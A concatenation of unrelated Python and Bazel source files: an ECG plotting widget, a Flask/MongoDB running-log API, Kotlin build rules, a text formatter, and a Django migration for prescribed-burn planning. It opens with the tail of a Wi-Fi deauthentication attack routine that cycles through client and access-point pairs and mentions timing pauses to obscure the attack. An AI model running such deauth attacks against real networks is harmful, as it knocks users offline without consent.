cycling a list of clients is fast enough. Also note that 1 deauth = 128 packets
Passing this option as zero makes it unlimited deauths
:param adapter: If not wlan0mon pass name here
:param timeout: how long is the attack
:param list_cycles: how many iterations over the list of victims
:param time_between_cycles: (int/float in seconds) can help obscure the attack
:return: nothing
IMPORTANT. List of clients exist on a per-channel basis. So this function needs to be
called for every channel where there are targets.
"""
CURR_TIME = datetime.now()
TIME_DIFF = datetime.now() - CURR_TIME
for i in range (list_cycles):
TIME_DIFF = datetime.now() - CURR_TIME
for pair in attack_dict:
if timeout < TIME_DIFF.total_seconds() :
print ("terminating timed attack")
break
else:
de_auth_client(
pair["client_mac"],
pair["ap_mac"],
deauths=de_auths_per_client,
adapter=adapter
)
if time_between_cycles > 0:
time.sleep(time_between_cycles)
if __name__ == "__main__":
pass
|
import pyqtgraph as pg
import os
import numpy as np
path = os.path.dirname(os.path.abspath(__file__))
uiFile = os.path.join(path, '../ui/ecg_summary.ui')
ECGSummaryView, TemplateBaseClass = pg.Qt.loadUiType(uiFile)
class ECGSummaryWidget(TemplateBaseClass):
def __init__(self, ecg, raw):
TemplateBaseClass.__init__(self)
# Create the main window
self.ui = ECGSummaryView()
self.ui.setupUi(self)
self.ui.raw.plot(ecg[0], raw, pen='r', )
self.ui.raw.getViewBox().setMouseEnabled(y=False)
self.ui.raw.setLabel('left', "Amplitude", units='A')
self.ui.raw.setLabel('bottom', "Time", units='s')
self.ui.filtered.plot(ecg[0], ecg[1], pen='g')
self.ui.filtered.setLabel('left', "Amplitude", units='A')
self.ui.filtered.setLabel('bottom', "Time", units='s')
self.ui.filtered.getViewBox().setMouseEnabled(y=False)
self.ui.hrv.plot(ecg[5], ecg[6], pen='y')
self.ui.hrv.setLabel('left', "Heart Rate")
self.ui.hrv.setLabel('bottom', "Time", units='s')
self.ui.hrv.getViewBox().setMouseEnabled(y=False)
t = ecg[4].T
template = np.zeros(t.shape[0])
for index, row in enumerate(t):
template[index] = row[0]
self.ui.template_plot.plot(ecg[3], template, pen='w')
self.ui.template_plot.getViewBox().setMouseEnabled(y=False)
self.show()
|
__version__ = "3.2.7"
|
from flask import Flask, render_template
from flask_restful import Api, Resource, reqparse, marshal_with, fields
from pymongo import MongoClient
from pymongo.database import Database
from pymongo.collection import Collection
from bson.objectid import ObjectId
from hashlib import md5
import os
app = Flask(__name__)
app.config['DEBUG'] = True
api = Api(app)
profile_fields = {
'_id': fields.String,
'first_name': fields.String,
'last_name': fields.String,
'email': fields.String,
'avatar': fields.String
}
run_fields = {
'_id': fields.String,
'profile_id': fields.String,
'duration': fields.Integer,
'kilometers': fields.Integer
}
if 'MONGO_HOST' in os.environ:
host = os.environ['MONGO_HOST']
else:
host = 'localhost'
client = MongoClient(host=host, port=27017)
db = Database(client, 'mongorun')
profiles = Collection(db, 'profiles')
runs = Collection(db, 'runs')
class ProfilesListResource(Resource):
@marshal_with(profile_fields)
def get(self):
return list(profiles.find({}))
@marshal_with(profile_fields)
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('first_name', type=unicode, required=True)
parser.add_argument('last_name', type=unicode, required=True)
parser.add_argument('email', type=unicode, required=True)
args = parser.parse_args()
doc = {
'first_name': args['first_name'],
'last_name': args['last_name'],
'email': args['email'],
'avatar': 'https://secure.gravatar.com/avatar/' + md5(args['email']).hexdigest() + '?d=identicon&s=200'
}
result = profiles.insert_one(doc)
doc['_id'] = str(result.inserted_id)
return doc
class ProfilesResource(Resource):
@marshal_with(profile_fields)
def get(self, profile_id):
return profiles.find_one({'_id': ObjectId(profile_id)})
class ProfilesRunsResource(Resource):
@marshal_with(run_fields)
def get(self, profile_id):
return list(runs.find({'profile_id': ObjectId(profile_id)}))
class RunListResource(Resource):
@marshal_with(run_fields)
def get(self):
return list(runs.find({}))
@marshal_with(run_fields)
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('profile_id', type=unicode, required=True)
parser.add_argument('duration', type=int, required=True)
parser.add_argument('kilometers', type=int, required=True)
args = parser.parse_args()
doc = {
'profile_id': ObjectId(args['profile_id']),
'duration': args['duration'],
'kilometers': args['kilometers']
}
result = runs.insert_one(doc)
doc['_id'] = str(result.inserted_id)
return doc
class RunResource(Resource):
@marshal_with(run_fields)
def get(self, run_id):
return runs.find_one({'_id': ObjectId(run_id)})
def delete(self, run_id):
count = runs.delete_one({'_id': ObjectId(run_id)}).deleted_count
if count > 0:
return 'DELETED', 204
else:
return 'Bad Run ID', 404
api.add_resource(ProfilesListResource, '/api/profiles')
api.add_resource(ProfilesResource, '/api/profiles/<profile_id>')
api.add_resource(ProfilesRunsResource, '/api/profiles/<profile_id>/runs')
api.add_resource(RunListResource, '/api/runs')
api.add_resource(RunResource, '/api/runs/<run_id>')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/<path:path>')
def index_path(path):
return render_template('index.html')
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the Kotlin compiler repository definitions. It should not be loaded directly by client workspaces.
"""
load("//kotlin/internal/repositories:setup.bzl", "kt_configure")
load("//kotlin/internal/repositories:tools.bzl", "absolute_target")
load(
"//kotlin/internal/repositories:release_repositories.bzl",
"KOTLIN_CURRENT_COMPILER_RELEASE",
_release_kotlin_repositories = "kotlin_repositories",
)
def kotlin_repositories(compiler_release = KOTLIN_CURRENT_COMPILER_RELEASE):
"""Call this in the WORKSPACE file to setup the Kotlin rules.
Args:
compiler_release: (internal) dict containing "urls" and "sha256" for the Kotlin compiler.
"""
kt_configure()
_release_kotlin_repositories(compiler_release)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A special text formatter.
Compatibility
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Python2: Yes
- Python3: Yes
Prerequisites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- None
Class, method, function, exception
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from __future__ import print_function
_function_words = set([
"a", "an", "the",
"and", "or", "not",
"in", "on", "at",
"with", "within", "as", "of",
"to", "from", "by",
])
def fmt_title(text):
"""Article title formatter.
Except functional words, first letter uppercase. Example:
"Google Killing Annoying Browsing Feature"
**中文文档**
文章标题的格式, 除了虚词, 每个英文单词的第一个字母大写。
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk for chunk in text.split(" ") if len(chunk) >= 1]
new_chunks = list()
for chunk in chunks:
if chunk not in _function_words:
chunk = chunk[0].upper() + chunk[1:]
new_chunks.append(chunk)
new_chunks[0] = new_chunks[0][0].upper() + new_chunks[0][1:]
return " ".join(new_chunks)
def fmt_sentence(text):
"""English sentence formatter.
First letter is always upper case. Example:
"Do you want to build a snow man?"
**中文文档**
句子格式。每句话的第一个单词第一个字母大写。
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk for chunk in text.split(" ") if len(chunk) >= 1]
chunks[0] = chunks[0][0].upper() + chunks[0][1:]
return " ".join(chunks)
def fmt_name(text):
"""Person name formatter.
For all words first letter uppercase. The rests lowercase. Single empty
space separator. Example: "James Bond"
**中文文档**
人名格式。每个单词的第一个字母大写。
"""
text = text.strip()
if len(text) == 0: # if empty string, return it
return text
else:
text = text.lower() # lower all char
# delete redundant empty space
chunks = [chunk[0].upper() + chunk[1:]
for chunk in text.split(" ") if len(chunk) >= 1]
return " ".join(chunks)
def fmt_filename(text):
"""File name formatter.
Remove all file system forbidden char from text.
**中文文档**
移除文件系统中不允许的字符。
"""
forbidden_char = ["\\", "/", ":", "*", "?", "|", "<", ">", '"']
for char in forbidden_char:
text = text.replace(char, "")
return text
#--- Unittest ---
if __name__ == "__main__":
import unittest
class Unittest(unittest.TestCase):
def test_fmt_title(self):
title = " google killing annoying browsing feature "
self.assertEqual(fmt_title(title),
"Google Killing Annoying Browsing Feature")
def test_fmt_sentence(self):
sentence = " do you want to build a snow man? "
self.assertEqual(fmt_sentence(sentence),
"Do you want to build a snow man?")
def test_fmt_name(self):
name = " michael jackson "
self.assertEqual(fmt_name(name), "Michael Jackson")
unittest.main()
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Season'
db.create_table(u'prescription_season', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_season_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_season_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('name', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=3)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'prescription', ['Season'])
# Adding model 'Region'
db.create_table(u'prescription_region', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=64)),
))
db.send_create_signal(u'prescription', ['Region'])
# Adding model 'District'
db.create_table(u'prescription_district', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=200)),
('code', self.gf('django.db.models.fields.CharField')(max_length=3)),
))
db.send_create_signal(u'prescription', ['District'])
# Adding model 'Shire'
db.create_table(u'prescription_shire', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('district', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.District'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Shire'])
# Adding unique constraint on 'Shire', fields ['name', 'district']
db.create_unique(u'prescription_shire', ['name', 'district_id'])
# Adding model 'VegetationType'
db.create_table(u'prescription_vegetationtype', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['VegetationType'])
# Adding model 'Tenure'
db.create_table(u'prescription_tenure', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Tenure'])
# Adding model 'Purpose'
db.create_table(u'prescription_purpose', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['Purpose'])
# Adding model 'ForecastArea'
db.create_table(u'prescription_forecastarea', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['ForecastArea'])
# Adding M2M table for field districts on 'ForecastArea'
db.create_table(u'prescription_forecastarea_districts', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('forecastarea', models.ForeignKey(orm[u'prescription.forecastarea'], null=False)),
('district', models.ForeignKey(orm[u'prescription.district'], null=False))
))
db.create_unique(u'prescription_forecastarea_districts', ['forecastarea_id', 'district_id'])
# Adding model 'EndorsingRole'
db.create_table(u'prescription_endorsingrole', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=320)),
('disclaimer', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'prescription', ['EndorsingRole'])
# Adding model 'Prescription'
db.create_table(u'prescription_prescription', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_prescription_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_prescription_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('burn_id', self.gf('django.db.models.fields.CharField')(max_length=7)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('district', self.gf('smart_selects.db_fields.ChainedForeignKey')(to=orm['prescription.District'], null=True, blank=True)),
('planned_year', self.gf('django.db.models.fields.PositiveIntegerField')(max_length=4)),
('planned_season', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64)),
('last_year', self.gf('django.db.models.fields.PositiveIntegerField')(max_length=4, null=True, blank=True)),
('last_season', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64, null=True, blank=True)),
('last_season_unknown', self.gf('django.db.models.fields.BooleanField')(default=False)),
('last_year_unknown', self.gf('django.db.models.fields.BooleanField')(default=False)),
('contentious', self.gf('django.db.models.fields.NullBooleanField')(default=None, null=True, blank=True)),
('contentious_rationale', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('aircraft_burn', self.gf('django.db.models.fields.BooleanField')(default=False)),
('allocation', self.gf('django.db.models.fields.PositiveSmallIntegerField')(max_length=64, null=True, blank=True)),
('priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('rationale', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('remote_sensing_priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=4)),
('treatment_percentage', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('location', self.gf('django.db.models.fields.CharField')(max_length=u'320', null=True, blank=True)),
('area', self.gf('django.db.models.fields.DecimalField')(default=0.0, max_digits=12, decimal_places=1)),
('perimeter', self.gf('django.db.models.fields.DecimalField')(default=0.0, max_digits=12, decimal_places=1)),
('bushfire_act_zone', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('prohibited_period', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('prescribing_officer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('short_code', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('planning_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('planning_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('endorsing_roles_determined', self.gf('django.db.models.fields.BooleanField')(default=False)),
('endorsement_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('endorsement_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('approval_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('approval_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('ignition_status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('ignition_status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('status_modified', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('biodiversity_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('biodiversity_text_additional', self.gf('django.db.models.fields.TextField')(blank=True)),
('bushfire_risk_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('vegetation_text', self.gf('django.db.models.fields.TextField')(blank=True)),
('ignition_completed_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('forest_blocks', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'prescription', ['Prescription'])
# Adding M2M table for field shires on 'Prescription'
db.create_table(u'prescription_prescription_shires', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('shire', models.ForeignKey(orm[u'prescription.shire'], null=False))
))
db.create_unique(u'prescription_prescription_shires', ['prescription_id', 'shire_id'])
# Adding M2M table for field regional_objectives on 'Prescription'
db.create_table(u'prescription_prescription_regional_objectives', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('regionalobjective', models.ForeignKey(orm[u'prescription.regionalobjective'], null=False))
))
db.create_unique(u'prescription_prescription_regional_objectives', ['prescription_id', 'regionalobjective_id'])
# Adding M2M table for field vegetation_types on 'Prescription'
db.create_table(u'prescription_prescription_vegetation_types', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('vegetationtype', models.ForeignKey(orm[u'prescription.vegetationtype'], null=False))
))
db.create_unique(u'prescription_prescription_vegetation_types', ['prescription_id', 'vegetationtype_id'])
# Adding M2M table for field tenures on 'Prescription'
db.create_table(u'prescription_prescription_tenures', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('tenure', models.ForeignKey(orm[u'prescription.tenure'], null=False))
))
db.create_unique(u'prescription_prescription_tenures', ['prescription_id', 'tenure_id'])
# Adding M2M table for field forecast_areas on 'Prescription'
db.create_table(u'prescription_prescription_forecast_areas', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('forecastarea', models.ForeignKey(orm[u'prescription.forecastarea'], null=False))
))
db.create_unique(u'prescription_prescription_forecast_areas', ['prescription_id', 'forecastarea_id'])
# Adding M2M table for field purposes on 'Prescription'
db.create_table(u'prescription_prescription_purposes', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('purpose', models.ForeignKey(orm[u'prescription.purpose'], null=False))
))
db.create_unique(u'prescription_prescription_purposes', ['prescription_id', 'purpose_id'])
# Adding M2M table for field endorsing_roles on 'Prescription'
db.create_table(u'prescription_prescription_endorsing_roles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('prescription', models.ForeignKey(orm[u'prescription.prescription'], null=False)),
('endorsingrole', models.ForeignKey(orm[u'prescription.endorsingrole'], null=False))
))
db.create_unique(u'prescription_prescription_endorsing_roles', ['prescription_id', 'endorsingrole_id'])
# Adding model 'PriorityJustification'
db.create_table(u'prescription_priorityjustification', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_priorityjustification_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_priorityjustification_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'], null=True)),
('purpose', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Purpose'])),
('order', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('criteria', self.gf('django.db.models.fields.TextField')(blank=True)),
('rationale', self.gf('django.db.models.fields.TextField')(blank=True)),
('priority', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('relevant', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'prescription', ['PriorityJustification'])
# Adding unique constraint on 'PriorityJustification', fields ['purpose', 'prescription']
db.create_unique(u'prescription_priorityjustification', ['purpose_id', 'prescription_id'])
# Adding model 'RegionalObjective'
db.create_table(u'prescription_regionalobjective', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_regionalobjective_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_regionalobjective_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('region', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Region'])),
('impact', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('fma_names', self.gf('django.db.models.fields.TextField')(blank=True)),
('objectives', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'prescription', ['RegionalObjective'])
# Adding model 'Objective'
db.create_table(u'prescription_objective', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_objective_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_objective_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('objectives', self.gf('django.db.models.fields.TextField')()),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
))
db.send_create_signal(u'prescription', ['Objective'])
# Adding model 'SuccessCriteria'
db.create_table(u'prescription_successcriteria', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_successcriteria_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_successcriteria_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('criteria', self.gf('django.db.models.fields.TextField')()),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
))
db.send_create_signal(u'prescription', ['SuccessCriteria'])
# Adding M2M table for field objectives on 'SuccessCriteria'
db.create_table(u'prescription_successcriteria_objectives', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('successcriteria', models.ForeignKey(orm[u'prescription.successcriteria'], null=False)),
('objective', models.ForeignKey(orm[u'prescription.objective'], null=False))
))
db.create_unique(u'prescription_successcriteria_objectives', ['successcriteria_id', 'objective_id'])
# Adding model 'SMEAC'
db.create_table(u'prescription_smeac', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('category', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['SMEAC'])
# Adding model 'DefaultBriefingChecklist'
db.create_table(u'prescription_defaultbriefingchecklist', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('smeac', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.SMEAC'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
))
db.send_create_signal(u'prescription', ['DefaultBriefingChecklist'])
# Adding model 'BriefingChecklist'
db.create_table(u'prescription_briefingchecklist', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_briefingchecklist_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_briefingchecklist_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('smeac', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.SMEAC'])),
('notes', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'prescription', ['BriefingChecklist'])
# Adding model 'Endorsement'
db.create_table(u'prescription_endorsement', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_endorsement_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_endorsement_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('role', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.EndorsingRole'])),
('endorsed', self.gf('django.db.models.fields.NullBooleanField')(default=None, null=True, blank=True)),
))
db.send_create_signal(u'prescription', ['Endorsement'])
# Adding model 'Approval'
db.create_table(u'prescription_approval', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_approval_created', to=orm['auth.User'])),
('modifier', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'prescription_approval_modified', to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('prescription', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['prescription.Prescription'])),
('initial_valid_to', self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now)),
('valid_to', self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now)),
('extension_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
))
db.send_create_signal(u'prescription', ['Approval'])
def backwards(self, orm):
# Removing unique constraint on 'PriorityJustification', fields ['purpose', 'prescription']
db.delete_unique(u'prescription_priorityjustification', ['purpose_id', 'prescription_id'])
# Removing unique constraint on 'Shire', fields ['name', 'district']
db.delete_unique(u'prescription_shire', ['name', 'district_id'])
# Deleting model 'Season'
db.delete_table(u'prescription_season')
# Deleting model 'Region'
db.delete_table(u'prescription_region')
# Deleting model 'District'
db.delete_table(u'prescription_district')
# Deleting model 'Shire'
db.delete_table(u'prescription_shire')
# Deleting model 'VegetationType'
db.delete_table(u'prescription_vegetationtype')
# Deleting model 'Tenure'
db.delete_table(u'prescription_tenure')
# Deleting model 'Purpose'
db.delete_table(u'prescription_purpose')
# Deleting model 'ForecastArea'
db.delete_table(u'prescription_forecastarea')
# Removing M2M table for field districts on 'ForecastArea'
db.delete_table('prescription_forecastarea_districts')
# Deleting model 'EndorsingRole'
db.delete_table(u'prescription_endorsingrole')
# Deleting model 'Prescription'
db.delete_table(u'prescription_prescription')
# Removing M2M table for field shires on 'Prescription'
db.delete_table('prescription_prescription_shires')
# Removing M2M table for field regional_objectives on 'Prescription'
db.delete_table('prescription_prescription_regional_objectives')
# Removing M2M table for field vegetation_types on 'Prescription'
db.delete_table('prescription_prescription_vegetation_types')
# Removing M2M table for field tenures on 'Prescription'
db.delete_table('prescription_prescription_tenures')
# Removing M2M table for field forecast_areas on 'Prescription'
db.delete_table('prescription_prescription_forecast_areas')
# Removing M2M table for field purposes on 'Prescription'
db.delete_table('prescription_prescription_purposes')
# Removing M2M table for field endorsing_roles on 'Prescription'
db.delete_table('prescription_prescription_endorsing_roles')
# Removing M2M table for field critical_stakeholders on 'Prescription'
db.delete_table('prescription_prescription_critical_stakeholders')
# Deleting model 'PriorityJustification'
db.delete_table(u'prescription_priorityjustification')
# Deleting model 'RegionalObjective'
db.delete_table(u'prescription_regionalobjective')
# Deleting model 'Objective'
db.delete_table(u'prescription_objective')
# Deleting model 'SuccessCriteria'
db.delete_table(u'prescription_successcriteria')
# Removing M2M table for field objectives on 'SuccessCriteria'
db.delete_table('prescription_successcriteria_objectives')
# Deleting model 'SMEAC'
db.delete_table(u'prescription_smeac')
# Deleting model 'DefaultBriefingChecklist'
db.delete_table(u'prescription_defaultbriefingchecklist')
# Deleting model 'BriefingChecklist'
db.delete_table(u'prescription_briefingchecklist')
# Deleting model 'Endorsement'
db.delete_table(u'prescription_endorsement')
# Deleting model 'Approval'
db.delete_table(u'prescription_approval')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
